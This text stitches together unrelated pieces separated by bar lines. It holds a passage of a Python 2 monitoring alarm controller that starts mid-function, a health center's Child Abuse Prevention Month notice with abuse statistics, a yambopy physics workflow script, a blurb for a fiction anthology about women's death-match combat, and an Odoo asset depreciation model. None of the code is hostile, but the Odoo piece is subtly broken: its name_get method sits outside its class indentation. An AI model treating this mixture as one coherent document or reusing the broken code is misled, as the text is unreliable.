                func.add_alarm(server_id,tags,host,port,create_time,db_type,'snmp_server','down','critical','snmp server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                func.update_db_status('snmp','3',host,'',create_time,'snmp_server','down','critical')
                func.update_db_status('process','-1',host,'','','','','')
                func.update_db_status('load_1','-1',host,'','','','','')
                func.update_db_status('cpu','-1',host,'','','','','')
                func.update_db_status('memory','-1',host,'','','','','')
                func.update_db_status('network','-1',host,'','','','','')
                func.update_db_status('disk','-1',host,'','','','','')
            else:
                func.check_if_ok(server_id,tags,host,port,create_time,db_type,'snmp_server','up','snmp server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                func.update_db_status('snmp',1,host,'',create_time,'snmp_server','up','ok')
                # Process count.
                if int(alarm_os_process)==1:
                    if int(process) >= int(threshold_critical_os_process):
                        send_mail = func.update_send_mail_status(host,db_type,'process',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(host,db_type,'process',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'process',process,'critical','too more process running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('process',3,host,'',create_time,'process',process,'critical')
                    elif int(process) >= int(threshold_warning_os_process):
                        send_mail = func.update_send_mail_status(host,db_type,'process',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(host,db_type,'process',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'process',process,'warning','too more process running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('process',2,host,'',create_time,'process',process,'warning')
                    else:
                        func.update_db_status('process',1,host,'',create_time,'process',process,'ok')
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'process',process,'process running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                # 1-minute load average.
                if int(alarm_os_load)==1:
                    if int(load_1) >= int(threshold_critical_os_load):
                        send_mail = func.update_send_mail_status(host,db_type,'load',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(host,db_type,'load',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'load',load_1,'critical','too high load',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('load_1',3,host,'',create_time,'load',load_1,'critical')
                    elif int(load_1) >= int(threshold_warning_os_load):
                        # BUGFIX: this call previously passed server_id (always 0
                        # for OS rows) instead of host, so warning-mail throttling
                        # counters collided across every monitored host.
                        send_mail = func.update_send_mail_status(host,db_type,'load',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(host,db_type,'load',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'load',load_1,'warning','too high load',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('load_1',2,host,'',create_time,'load',load_1,'warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'load',load_1,'load ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('load_1',1,host,'',create_time,'load',load_1,'ok')
                # CPU: thresholds are configured as usage %, compare on idle %.
                if int(alarm_os_cpu)==1:
                    threshold_critical_os_cpu = int(100-threshold_critical_os_cpu)
                    threshold_warning_os_cpu = int(100-threshold_warning_os_cpu)
                    if int(cpu_idle) <= int(threshold_critical_os_cpu):
                        send_mail = func.update_send_mail_status(host,db_type,'cpu_idle',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(host,db_type,'cpu_idle',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','critical','too little cpu idle',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('cpu',3,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','critical')
                    elif int(cpu_idle) <= int(threshold_warning_os_cpu):
                        send_mail = func.update_send_mail_status(host,db_type,'cpu_idle',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(host,db_type,'cpu_idle',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','warning','too little cpu idle',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('cpu',2,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','cpu idle ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('cpu',1,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','ok')
                # Memory usage, collected as a '<n>%' string.
                if int(alarm_os_memory)==1:
                    if memory_usage:
                        memory_usage_int = int(memory_usage.split('%')[0])
                    else:
                        memory_usage_int = 0
                    if int(memory_usage_int) >= int(threshold_critical_os_memory):
                        send_mail = func.update_send_mail_status(host,db_type,'memory',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(host,db_type,'memory',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'critical','too more memory usage',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('memory',3,host,'',create_time,'memory',memory_usage,'critical')
                    elif int(memory_usage_int) >= int(threshold_warning_os_memory):
                        send_mail = func.update_send_mail_status(host,db_type,'memory',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(host,db_type,'memory',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'warning','too more memory usage',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('memory',2,host,'',create_time,'memory',memory_usage,'warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'memory usage ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('memory',1,host,'',create_time,'memory',memory_usage,'ok')
    else:
        pass
def get_alarm_os_disk():
    """Check the latest per-mountpoint disk-usage samples and raise,
    escalate or clear disk alarms for every monitored OS host."""
    sql = "select a.ip,a.mounted,a.used_rate,a.create_time,b.tags,b.alarm_os_disk,b.threshold_warning_os_disk,b.threshold_critical_os_disk,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_disk a,db_cfg_os b where a.ip=b.host group by ip,mounted order by SUBSTRING_INDEX(used_rate,'%',1)+0 asc;"
    result = func.mysql_query(sql)
    if result != 0:
        for row in result:
            # Unpack one sample row together with its per-host alarm settings.
            (host, mounted, used_rate, create_time, tags, alarm_os_disk,
             threshold_warning, threshold_critical, send_mail,
             send_mail_to_list, send_sms, send_sms_to_list) = row
            server_id = 0
            db_type = "os"
            port = ''
            # "85%" -> 85
            used_rate_int = int(used_rate.split("%")[0])
            # Fall back to the globally configured recipients when the host
            # has no specific mail/sms list.
            if send_mail_to_list is None or send_mail_to_list.strip() == '':
                send_mail_to_list = mail_to_list_common
            if send_sms_to_list is None or send_sms_to_list.strip() == '':
                send_sms_to_list = sms_to_list_common
            if int(alarm_os_disk) != 1:
                continue  # disk alarming disabled for this host
            item = 'disk_usage(%s)' % (mounted,)
            if int(used_rate_int) >= int(threshold_critical):
                send_mail = func.update_send_mail_status(host, db_type, item, send_mail, send_mail_max_count)
                send_sms = func.update_send_sms_status(host, db_type, item, send_sms, send_sms_max_count)
                func.add_alarm(server_id, tags, host, port, create_time, db_type, item, used_rate, 'critical', 'disk %s usage reach %s' % (mounted, used_rate), send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('disk', 3, host, '', create_time, item, used_rate, 'critical')
            elif int(used_rate_int) >= int(threshold_warning):
                send_mail = func.update_send_mail_status(host, db_type, item, send_mail, send_mail_max_count)
                send_sms = func.update_send_sms_status(host, db_type, item, send_sms, send_sms_max_count)
                func.add_alarm(server_id, tags, host, port, create_time, db_type, item, used_rate, 'warning', 'disk %s usage reach %s' % (mounted, used_rate), send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('disk', 2, host, '', create_time, item, used_rate, 'warning')
            else:
                func.check_if_ok(server_id, tags, host, port, create_time, db_type, item, used_rate, 'disk %s usage ok' % (mounted,), send_mail, send_mail_to_list, send_sms, send_sms_to_list)
                func.update_db_status('disk', 1, host, '', create_time, 'disk_usage', 'max(%s:%s)' % (mounted, used_rate), 'ok')
def get_alarm_os_network():
    # Check per-interface network throughput (in+out bytes) against the
    # configured warning/critical thresholds and raise or clear alarms.
    sql="select a.ip,a.if_descr,a.in_bytes,a.out_bytes,sum(in_bytes+out_bytes) sum_bytes,a.create_time,b.tags,b.alarm_os_network,b.threshold_warning_os_network,b.threshold_critical_os_network,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_net a,db_cfg_os b where a.ip=b.host group by ip,if_descr order by sum(in_bytes+out_bytes) asc;"
    result=func.mysql_query(sql)
    if result <> 0:  # Python 2 inequality operator; query returns 0 on no rows
        for line in result:
            host=line[0]
            if_descr=line[1]          # interface name (e.g. eth0)
            in_bytes=line[2]
            out_bytes=line[3]
            sum_bytes=line[4]         # in+out total compared to thresholds
            create_time=line[5]
            tags=line[6]
            alarm_os_network=line[7]  # 1 = alarming enabled for this host
            # Thresholds are presumably configured in MB — converted to
            # bytes here to match sum_bytes; TODO confirm the config unit.
            threshold_warning_os_network=(line[8])*1024*1024
            threshold_critical_os_network=(line[9])*1024*1024
            send_mail=line[10]
            send_mail_to_list=line[11]
            send_sms=line[12]
            send_sms_to_list=line[13]
            server_id=0
            tags=tags
            db_type="os"
            port=''
            # Fall back to the global recipient lists when none is configured.
            if send_mail_to_list is None or send_mail_to_list.strip()=='':
                send_mail_to_list = mail_to_list_common
            if send_sms_to_list is None or send_sms_to_list.strip()=='':
                send_sms_to_list = sms_to_list_common
            if int(alarm_os_network)==1:
                if int(sum_bytes) >= int(threshold_critical_os_network):
                    # Throttle counters are updated first, then the alarm is queued.
                    send_mail = func.update_send_mail_status(host,db_type,'network(%s)' %(if_descr),send_mail,send_mail_max_count)
                    send_sms = func.update_send_sms_status(host,db_type,'network(%s)' %(if_descr),send_sms,send_sms_max_count)
                    func.add_alarm(server_id,tags,host,port,create_time,db_type,'network(%s)' %(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'critical','network %s bytes reach %s' %(if_descr,sum_bytes),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                    func.update_db_status('network',3,host,'',create_time,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'critical')
                elif int(sum_bytes) >= int(threshold_warning_os_network):
                    send_mail = func.update_send_mail_status(host,db_type,'network(%s)' %(if_descr),send_mail,send_mail_max_count)
                    send_sms = func.update_send_sms_status(host,db_type,'network(%s)' %(if_descr),send_sms,send_sms_max_count)
                    func.add_alarm(server_id,tags,host,port,create_time,db_type,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'warning','network %s bytes reach %s' %(if_descr,sum_bytes),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                    func.update_db_status('network',2,host,'',create_time,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'warning')
                else:
                    # Below both thresholds: clear any previous alarm state.
                    func.check_if_ok(server_id,tags,host,port,create_time,db_type,'network(%s)'%(if_descr),'in:%s,out:%s' %(in_bytes,out_bytes),'network %s bytes ok' %(if_descr),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                    func.update_db_status('network',1,host,'',create_time,'network','max(%s-in:%s,out:%s)' %(if_descr,in_bytes,out_bytes),'ok')
            else:
                pass
def send_alarm():
    # Dispatch every queued alarm by mail and/or sms (honoring the global
    # send switches and per-alarm throttling flags), archive each alarm
    # into alarm_history with its delivery status, then clear the queue.
    sql = "select tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,id alarm_id from alarm;"
    result=func.mysql_query(sql)
    if result <> 0:  # Python 2 inequality operator; query returns 0 on no rows
        # Global on/off switches for the two delivery channels.
        send_alarm_mail = func.get_option('send_alarm_mail')
        send_alarm_sms = func.get_option('send_alarm_sms')
        for line in result:
            tags=line[0]
            host=line[1]
            port=line[2]
            create_time=line[3]
            db_type=line[4]
            alarm_item=line[5]
            alarm_value=line[6]
            level=line[7]           # 'warning' or 'critical'
            message=line[8]
            send_mail=line[9]       # per-alarm flag set by the throttle logic
            send_mail_to_list=line[10]
            send_sms=line[11]
            send_sms_to_list=line[12]
            alarm_id=line[13]
            # Display name: "host:port" for DB targets, bare host for OS.
            if port:
                server = host+':'+port
            else:
                server = host
            # No recipients means the channel is effectively disabled
            # for this alarm.
            if send_mail_to_list:
                mail_to_list=send_mail_to_list.split(';')
            else:
                send_mail=0
            if send_sms_to_list:
                sms_to_list=send_sms_to_list.split(';')
            else:
                send_sms=0
            # --- mail channel ---
            if int(send_alarm_mail)==1:
                if send_mail==1:
                    mail_subject='['+level+'] '+db_type+'-'+tags+'-'+server+' '+message+' Time:'+create_time.strftime('%Y-%m-%d %H:%M:%S')
                    mail_content="""
                    Type: %s\n<br/>
                    Tags: %s\n<br/>
                    Host: %s:%s\n<br/>
                    Level: %s\n<br/>
                    Item: %s\n<br/>
                    Value: %s\n<br/>
                    Message: %s\n<br/>
                    """ %(db_type,tags,host,port,level,alarm_item,alarm_value,message)
                    result = sendmail.send_mail(mail_to_list,mail_subject,mail_content)
                    # Record whether delivery succeeded (1) or failed (0).
                    if result:
                        send_mail_status=1
                    else:
                        send_mail_status=0
                else:
                    send_mail_status=0
            else:
                send_mail_status=0
            # --- sms channel ---
            if int(send_alarm_sms)==1:
                if send_sms==1:
                    sms_msg='['+level+'] '+db_type+'-'+tags+'-'+server+' '+message+' Time:'+create_time.strftime('%Y-%m-%d %H:%M:%S')
                    # Two sms backends are supported; 'fetion' vs generic API.
                    send_sms_type = func.get_option('smstype')
                    if send_sms_type == 'fetion':
                        result = sendsms_fx.send_sms(sms_to_list,sms_msg,db_type,tags,host,port,level,alarm_item,alarm_value,message)
                    else:
                        result = sendsms_api.send_sms(sms_to_list,sms_msg,db_type,tags,host,port,level,alarm_item,alarm_value,message)
                    if result:
                        send_sms_status=1
                    else:
                        send_sms_status=0
                else:
                    send_sms_status=0
            else:
                send_sms_status=0
            # Archive this alarm (with delivery statuses) into alarm_history.
            try:
                sql="insert into alarm_history(server_id,tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,send_mail_status,send_sms_status) select server_id,tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,%s,%s from alarm where id=%s;"
                param=(send_mail_status,send_sms_status,alarm_id)
                func.mysql_exec(sql,param)
            except Exception, e:
                # Python 2 except syntax; best-effort archive — a failed
                # insert must not stop the remaining alarms.
                print e
        # All alarms processed and archived above: clear the queue in one shot.
        func.mysql_exec("delete from alarm",'')
    else:
        pass
def _purge_alarm_temp(alarm_type, sleep_minutes):
    """Delete alarm_temp rows of `alarm_type` ('mail' or 'sms') older than
    `sleep_minutes` minutes, so throttled alarms become eligible for
    re-sending once their sleep window has expired.

    :param alarm_type: throttle channel, 'mail' or 'sms'
    :param sleep_minutes: window length in minutes (int or numeric string)
    """
    # Cutoff = current local time (second precision, matching the previous
    # strftime/strptime round-trip) minus the configured sleep window.
    now = datetime.datetime.now().replace(microsecond=0)
    cutoff = now - datetime.timedelta(minutes=int(sleep_minutes))
    sleep_alarm_time = cutoff.strftime('%Y-%m-%d %H:%M:%S')
    # Both interpolated values are internally generated (a fixed channel
    # name and a computed timestamp), so %-interpolation is safe here.
    sql = "delete from alarm_temp where alarm_type='%s' and create_time <= '%s' " % (alarm_type, sleep_alarm_time)
    func.mysql_exec(sql, ())


def check_send_alarm_sleep():
    """Expire throttle records for both the mail and the sms channels.

    The two branches previously duplicated the same date arithmetic and
    shadowed the builtin `format`; the shared logic now lives in
    `_purge_alarm_temp`.
    """
    send_mail_sleep_time = func.get_option('send_mail_sleep_time')
    send_sms_sleep_time = func.get_option('send_sms_sleep_time')
    if send_mail_sleep_time:
        _purge_alarm_temp('mail', send_mail_sleep_time)
    if send_sms_sleep_time:
        _purge_alarm_temp('sms', send_sms_sleep_time)
def main():
    """Run one full alarm-controller pass: expire throttle records,
    evaluate every enabled monitor family, dispatch the pending alarms
    and stamp the global check time."""
    logger.info("alarm controller started.")
    check_send_alarm_sleep()
    # Read every monitor switch up front (same order as before)...
    switches = {}
    for option_name in ('monitor_mysql', 'monitor_mongodb', 'monitor_sqlserver',
                        'monitor_oracle', 'monitor_redis', 'monitor_os'):
        switches[option_name] = func.get_option(option_name)
    # ...then run the check functions of each family that is enabled ("1"),
    # preserving the original execution order.
    checks = (
        ('monitor_mysql', (get_alarm_mysql_status, get_alarm_mysql_replcation)),
        ('monitor_oracle', (get_alarm_oracle_status, get_alarm_oracle_tablespace,
                            get_alarm_oracle_diskgroup)),
        ('monitor_sqlserver', (get_alarm_sqlserver_status,)),
        ('monitor_mongodb', (get_alarm_mongodb_status,)),
        ('monitor_redis', (get_alarm_redis_status,)),
        ('monitor_os', (get_alarm_os_status, get_alarm_os_disk, get_alarm_os_network)),
    )
    for option_name, alarm_checks in checks:
        if switches[option_name] == "1":
            for alarm_check in alarm_checks:
                alarm_check()
    send_alarm()
    func.update_check_time()
    logger.info("alarm controller finished.")
# Script entry point: perform a single alarm-controller run when executed
# directly (e.g. from cron), not when imported as a module.
if __name__ == '__main__':
    main()
|
April is Child Abuse Prevention Month. This month and throughout the year, Whittier Street Health Center encourages all individuals, families, and organizations to play a role in making Roxbury and the surrounding communities a better place for all children and families.
The principal types of maltreatment of children are neglect, physical abuse, emotional abuse, and sexual abuse.
Neglect is the failure of the parent or caretaker, either deliberately or through negligence or inability, to provide a child with minimally adequate food, shelter, clothing, supervision, medical care, emotional stability and growth, and other essential care. However, inadequate economic resources or the existence of a handicapping condition need to be considered.
Physical and emotional abuse is any action that creates an injury or substantial risk to a child. Physical abuse includes beating, shaking, kicking, burning, or other types of bodily harm that can result in bruises, fractured or broken bones, internal injuries, or death.
Sexual abuse occurs when an adult has any sexual contact with a child. Sexual exploitation and molestation are also considered abuse.
The rate of reported child abuse is higher in Massachusetts, at 53.8 per 1,000 children, compared to the national average in the United States of 46.1. In Massachusetts, the rates of reported abuse were higher among African-American (23.8) and Hispanic (21.8) children than their white counterparts (7.9). Children living in homes where domestic violence was present were also at a higher risk of child abuse (6.7 versus 2.2). Children with disabilities (intellectual disability, emotional disturbance, learning disability, physical disability, or behavioral problems) are also at higher risk for child abuse.
Whittier hosts a series of programs to raise awareness of Child Abuse Prevention Month. During the week of April 7 to 11, from 4:30 pm to 6:30 pm, the Whittier Youth Services Enrichment (WYSE) program held workshops on promoting safety and engagement in healthy, peaceful activities.
U.S. Department of Health and Human Services, Administration for Children and Families, Administration on Children, Youth and Families, Children’s Bureau. (2013). Child maltreatment 2012. Available from http://www.acf.hhs.gov/programs/cb/research-data-technology/statistics-research/child-maltreatment.
|
#
# Author: Henrique Pereira Coutada Miranda
# Run a IP calculation using yambo
#
from __future__ import print_function
import sys
from yambopy import *
from qepy import *
import argparse
# Parse the command-line flags that select which stages of the workflow run.
parser = argparse.ArgumentParser(description='Test the yambopy script.')
parser.add_argument('-dg','--doublegrid', action="store_true", help='Use double grid')
parser.add_argument('-c', '--calc', action="store_true", help='calculate the IP absorption')
parser.add_argument('-p', '--plot', action="store_true", help='plot the results')
args = parser.parse_args()

# With no flags there is nothing to do: show usage and exit non-zero.
if len(sys.argv)==1:
    parser.print_help()
    sys.exit(1)

yambo = "yambo"   # name of the yambo executable invoked via os.system
folder = 'ip'     # working folder for the independent-particle (IP) run

# NOTE(review): `os` is never imported explicitly in this script; it is
# presumably re-exported by the `yambopy`/`qepy` star imports — confirm.
# Check if the SAVE folder is present; if not, build the yambo database
# from the nscf Quantum ESPRESSO output via p2y + a first yambo run.
if not os.path.isdir('database/SAVE'):
    print('preparing yambo database')
    os.system('mkdir -p database')
    os.system('cd nscf/bn.save; p2y > p2y.log')
    os.system('cd nscf/bn.save; yambo > yambo.log')
    os.system('mv nscf/bn.save/SAVE database')

# Seed the run folder with a copy of the SAVE database.
if not os.path.isdir(folder):
    os.mkdir(folder)
    os.system('cp -r database/SAVE %s'%folder)

# Initialize the double grid: write a ypp input mapping the coarse k-grid
# onto the denser grid stored in ../database_double, then run ypp.
if args.doublegrid:
    print("creating double grid")
    f = open('%s/ypp.in'%folder,'w')
    # The literal below is ypp input syntax; its content must stay as-is.
    f.write("""kpts_map
%DbGd_DB1_paths
"../database_double"
%""")
    f.close()
    os.system('cd %s; ypp'%folder)

# Build the yambo input for an optics run ('-o g') and execute it.
if args.calc:
    #create the yambo input file
    y = YamboIn('yambo -o g -V all',folder=folder)
    y['FFTGvecs'] = [30,'Ry']      # plane-wave cutoff for FFTs
    y['BndsRnXs'] = [1,30]         # band range for the response
    y['QpntsRXd'] = [[1,1],'']     # q-point selection
    y['ETStpsXd'] = 500            # number of energy steps
    y.write('%s/yambo_run.in'%folder)
    print('running yambo')
    os.system('cd %s; %s -F yambo_run.in -J yambo'%(folder,yambo))

# Collect the run output into a json file for later plotting/analysis.
if args.plot:
    #pack in a json file
    y = YamboOut(folder)
    y.pack()
|
Anthology of Anfer(The Death Matches) focuses on the warrior women of Anfer and their contests...some for the entertainment of their sponsors...some in private...always to the death. This is the way the warrior women of Anfer live...they live for the thrill of combat against another woman. This issue contains four fight stories.
|
# Author(s): Silvio Gregorini (silviogregorini@openforce.it)
# Copyright 2019 Openforce Srls Unipersonale (www.openforce.it)
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from odoo import _, api, fields, models
from odoo.exceptions import ValidationError
from odoo.tools import float_compare, float_is_zero
class AssetDepreciation(models.Model):
    """One depreciation plan of an asset for a given depreciation type.

    An asset can carry several depreciations (e.g. civil vs fiscal), each
    with its own mode, percentage and lines; the `amount_*` fields are
    aggregates recomputed from the lines by `_compute_amounts`.
    """
    _name = 'asset.depreciation'
    _description = "Assets Depreciations"

    # Base amount to depreciate; initialized from the asset purchase
    # amount scaled by `base_coeff` (see `onchange_base_coeff`).
    amount_depreciable = fields.Monetary(
        string="Depreciable Amount"
    )
    # Depreciable base corrected by "update" move lines; zeroed once the
    # asset is sold (see `get_computed_amounts`).
    amount_depreciable_updated = fields.Monetary(
        compute='_compute_amounts',
        store=True,
        string="Updated Amount",
    )
    # Total already depreciated, aggregated from the lines.
    amount_depreciated = fields.Monetary(
        compute='_compute_amounts',
        store=True,
        string="Depreciated Amount",
    )
    # Aggregates below are mapped from `line_ids.get_balances_grouped()`
    # onto the matching `amount_<group>` field (absolute values).
    amount_gain = fields.Monetary(
        compute='_compute_amounts',
        string="Capital Gain",
        store=True,
    )
    amount_historical = fields.Monetary(
        compute='_compute_amounts',
        store=True,
        string="Historical Amount",
    )
    amount_in = fields.Monetary(
        compute='_compute_amounts',
        store=True,
        string="In Amount",
    )
    amount_loss = fields.Monetary(
        compute='_compute_amounts',
        store=True,
        string="Capital Loss",
    )
    amount_out = fields.Monetary(
        compute='_compute_amounts',
        store=True,
        string="Out Amount",
    )
    # What is still left to depreciate; zeroed once the asset is sold.
    amount_residual = fields.Monetary(
        compute='_compute_amounts',
        store=True,
        string="Residual Amount",
    )
    # Owning asset; deleting the asset deletes its depreciations.
    asset_id = fields.Many2one(
        'asset.asset',
        ondelete='cascade',
        readonly=True,
        required=True,
        string="Asset",
    )
    base_coeff = fields.Float(
        default=1,
        help="Coeff to compute amount depreciable from purchase amount",
        string="Depreciable Base Coeff",
    )
    # Company/currency follow the asset.
    company_id = fields.Many2one(
        'res.company',
        readonly=True,
        related='asset_id.company_id',
        string="Company"
    )
    currency_id = fields.Many2one(
        'res.currency',
        readonly=True,
        related='asset_id.currency_id',
        string="Currency"
    )
    # Depreciations cannot be computed before this date
    # (see `get_depreciation_amount_multiplier`).
    date_start = fields.Date(
        string="Date Start"
    )
    # Account move created on asset dismissal
    # (see `generate_dismiss_account_move`).
    dismiss_move_id = fields.Many2one(
        'account.move',
        string="Dismiss Move"
    )
    # Numbering of depreciation lines; the `force_*` flags below control
    # how/whether `first_dep_nr` gets normalized back to 1.
    first_dep_nr = fields.Integer(
        default=1,
        string="First Dep. Num",
    )
    force_all_dep_nr = fields.Boolean(
        string="Force All Dep. Num"
    )
    force_first_dep_nr = fields.Boolean(
        string="Force First Dep. Num"
    )
    # Date of the newest 'depreciated' line, partial dismissals excluded.
    last_depreciation_date = fields.Date(
        compute='_compute_last_depreciation_date',
        store=True,
        string="Last Dep.",
    )
    line_ids = fields.One2many(
        'asset.depreciation.line',
        'depreciation_id',
        string="Lines"
    )
    # Depreciation mode: contributes its own multiplier to the yearly amount.
    mode_id = fields.Many2one(
        'asset.depreciation.mode',
        required=True,
        string="Mode",
    )
    # Yearly depreciation percentage (base multiplier = percentage / 100).
    percentage = fields.Float(
        string="Depreciation (%)"
    )
    pro_rata_temporis = fields.Boolean(
        string="Pro-rata Temporis"
    )
    requires_account_move = fields.Boolean(
        readonly=True,
        related='type_id.requires_account_move',
        string="Requires Account Move",
    )
    # Derived from the amounts, see `get_depreciation_state`.
    state = fields.Selection(
        [('non_depreciated', "Non Depreciated"),
         ('partially_depreciated', "Partially Depreciated"),
         ('totally_depreciated', "Depreciated")],
        compute='_compute_state',
        default='non_depreciated',
        store=True,
        string="State"
    )
    type_id = fields.Many2one(
        'asset.depreciation.type',
        string="Depreciation Type"
    )
    # Depreciation amount is forced to 0 up to (and including) this date.
    zero_depreciation_until = fields.Date(
        string="Zero Depreciation Up To"
    )
    @api.model
    def create(self, vals):
        """Create the depreciation, then normalize its numbering.

        After the standard create, the first depreciation number is
        normalized and, when numbered lines were created alongside (e.g.
        via One2many values), their numbering is normalized too.
        """
        dep = super().create(vals)
        dep.normalize_first_dep_nr()
        if dep.line_ids:
            num_lines = dep.line_ids.filtered('requires_depreciation_nr')
            if num_lines:
                num_lines.normalize_depreciation_nr()
        return dep

    @api.multi
    def write(self, vals):
        """Write, then re-normalize any numbering the write invalidated."""
        res = super().write(vals)
        # Depreciations whose first number is now inconsistent with the
        # force flags (see `need_normalize_first_dep_nr`).
        need_norm = self.filtered(lambda d: d.need_normalize_first_dep_nr())
        if need_norm:
            need_norm.normalize_first_dep_nr(force=True)
        for dep in self:
            num_lines = dep.line_ids.filtered('requires_depreciation_nr')
            if num_lines and num_lines.need_normalize_depreciation_nr():
                num_lines.normalize_depreciation_nr(force=True)
        return res
    @api.multi
    def unlink(self):
        """Forbid deletion while lines exist or dismissal moves are posted."""
        # Depreciation lines hold accounting history: block deletion.
        if self.mapped('line_ids'):
            raise ValidationError(
                _("Cannot delete depreciations if there is any depreciation"
                  " line linked to it.")
            )
        # Block deletion when any dismissal move is already posted.
        if any([m.state != 'draft' for m in self.mapped('dismiss_move_id')]):
            deps = self.filtered(
                lambda l: l.dismiss_move_id
                and l.dismiss_move_id.state != 'draft'
            )
            # name_get() returns (id, display_name) pairs: keep names only.
            name_list = "\n".join([l[-1] for l in deps.name_get()])
            raise ValidationError(
                _("Following lines are linked to posted account moves, and"
                  " cannot be deleted:\n{}").format(name_list)
            )
        return super().unlink()
@api.multi
def name_get(self):
return [(dep.id, dep.make_name()) for dep in self]
    @api.multi
    @api.depends(
        'amount_depreciable', 'amount_depreciable_updated', 'amount_residual'
    )
    def _compute_state(self):
        # Per-record state logic is delegated to `get_depreciation_state`.
        for dep in self:
            dep.state = dep.get_depreciation_state()
    @api.onchange('asset_id', 'base_coeff')
    def onchange_base_coeff(self):
        # Depreciable base = asset purchase amount scaled by the coefficient.
        purchase_amount = self.asset_id.purchase_amount
        self.amount_depreciable = self.base_coeff * purchase_amount

    @api.onchange('first_dep_nr')
    def onchange_normalize_first_dep_nr(self):
        # The first depreciation number must be strictly positive.
        if self.first_dep_nr <= 0:
            self.first_dep_nr = 1

    @api.onchange('force_all_dep_nr')
    def onchange_force_all_dep_nr(self):
        # Forcing every number manually resets the first number to 1.
        if self.force_all_dep_nr:
            self.first_dep_nr = 1

    @api.onchange('force_first_dep_nr')
    def onchange_force_first_dep_nr(self):
        # Forcing only the first number still requires it to be positive.
        if self.force_first_dep_nr and self.first_dep_nr <= 0:
            self.first_dep_nr = 1

    @api.onchange('force_all_dep_nr', 'force_first_dep_nr')
    def onchange_force_dep_nrs(self):
        # The two "force" flags are mutually exclusive: reset both and warn.
        if self.force_all_dep_nr and self.force_first_dep_nr:
            self.force_all_dep_nr = False
            self.force_first_dep_nr = False
            title = _("Warning!")
            msg = _(
                "Fields `Force All Dep. Num` and `Force First Dep. Num`"
                " cannot be both active."
            )
            return {'warning': {'title': title, 'message': msg}}
        if not self.force_all_dep_nr and self.force_first_dep_nr:
            self.first_dep_nr = 1
    @api.multi
    @api.depends('amount_depreciable',
                 'line_ids.amount',
                 'line_ids.balance',
                 'line_ids.move_type',
                 'asset_id.sold')
    def _compute_amounts(self):
        # Recompute every stored amount_* aggregate from the lines; the
        # actual computation lives in `get_computed_amounts`.
        for dep in self:
            vals = dep.get_computed_amounts()
            dep.update(vals)

    @api.multi
    @api.depends('line_ids', 'line_ids.date', 'line_ids.move_type')
    def _compute_last_depreciation_date(self):
        """
        Update date upon deps with at least one depreciation line (excluding
        partial dismissal); else set field to False
        """
        for dep in self:
            # Only true depreciation lines count, partial dismissals do not.
            dep_lines = dep.line_ids.filtered(
                lambda l: l.move_type == 'depreciated'
                and not l.partial_dismissal
            )
            if dep_lines:
                dep.last_depreciation_date = max(dep_lines.mapped('date'))
            else:
                dep.last_depreciation_date = False
